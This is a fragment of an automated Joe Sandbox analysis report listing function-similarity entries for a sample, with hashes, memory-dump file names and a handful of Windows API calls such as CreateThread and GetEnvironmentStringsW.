• API String ID: 2652629310-0
• Opcode ID: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
• Instruction ID: 2d564270878c5035ecfded40e034aa591679c2de812d959179a7d3d6c0711b23
• Opcode Fuzzy Hash: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
• Instruction Fuzzy Hash: 5B319072A0221AABDF26DF74DC45DEE7BA5EB41350F148168FC04E6261EB39DD50CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: _wcschr
• String ID: .lnk$ds
• API String ID: 2691759472-1819217326
• Opcode ID: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
• Instruction ID: a780ea51195344ca51725b2f1cdb487c20d99200bf7fb6156ec6cc7c409d317f
• Opcode Fuzzy Hash: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
• Instruction Fuzzy Hash: DDA1317290012996EF34DBA4DD59EFA73FCAF44304F0885A6B509E7142EF789F848B61
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00010000,00731160,?,00000000,00000000), ref: 00731043
• SetThreadPriority.KERNEL32(?,00000000), ref: 0073108A
  • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
  • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E0A
  • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E19
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2706921342-3849766595
• Opcode ID: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
• Instruction ID: 0a8009cc8bade56628ba07e67d621f4ed6e2280baf961a9279ce8eb76758a1f9
• Opcode Fuzzy Hash: f032abed455112b54a1f959d6787a5d81e04ebe1988f0e812243d7d9130640fd
• Instruction Fuzzy Hash: CE01FEB534430D6FE7346F64AC55BB6B359EB40751F20042EF947521D1CEE96CC54624
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: _wcschr
• String ID: <9u$?*<>|"
• API String ID: 2691759472-1881834610
• Opcode ID: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
• Instruction ID: 5e5c9f2ee500926741c626ae99eaaa3765fc4562f73a282fb6db53df7c550436
• Opcode Fuzzy Hash: 9dbe60ce3a1ff67ab8ea4464e774f43190686f163ae3b34976749307b15c9b46
• Instruction Fuzzy Hash: B8F0D153A44321C1C7311A29BC01B3AB3E4EFB5720F38081EE5C8872D2E6AD98C082A5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0074BF30: GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
  • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
  • Part of subcall function 0074BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
  • Part of subcall function 0074BF30: _free.LIBCMT ref: 0074BF95
  • Part of subcall function 0074BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
• _free.LIBCMT ref: 007482AE
• _free.LIBCMT ref: 007482B5
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
• String ID: 0"x
• API String ID: 400815659-575046572
• Opcode ID: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
• Instruction ID: 1f5f410fc78f00ec7d8363e5c4a4ce0d6744abc99434c38bd5af54256bcf67f6
• Opcode Fuzzy Hash: 7505c69dc6535633e76b85dee9e95338e4001b3c6091babb21e435f5a2f92159
• Instruction Fuzzy Hash: 43E02B33B0AD46D192E132792C0E62F0640AFC5339B150326F910CB0D3CF9C880749E7
Uniqueness

Uniqueness Score: -1.00%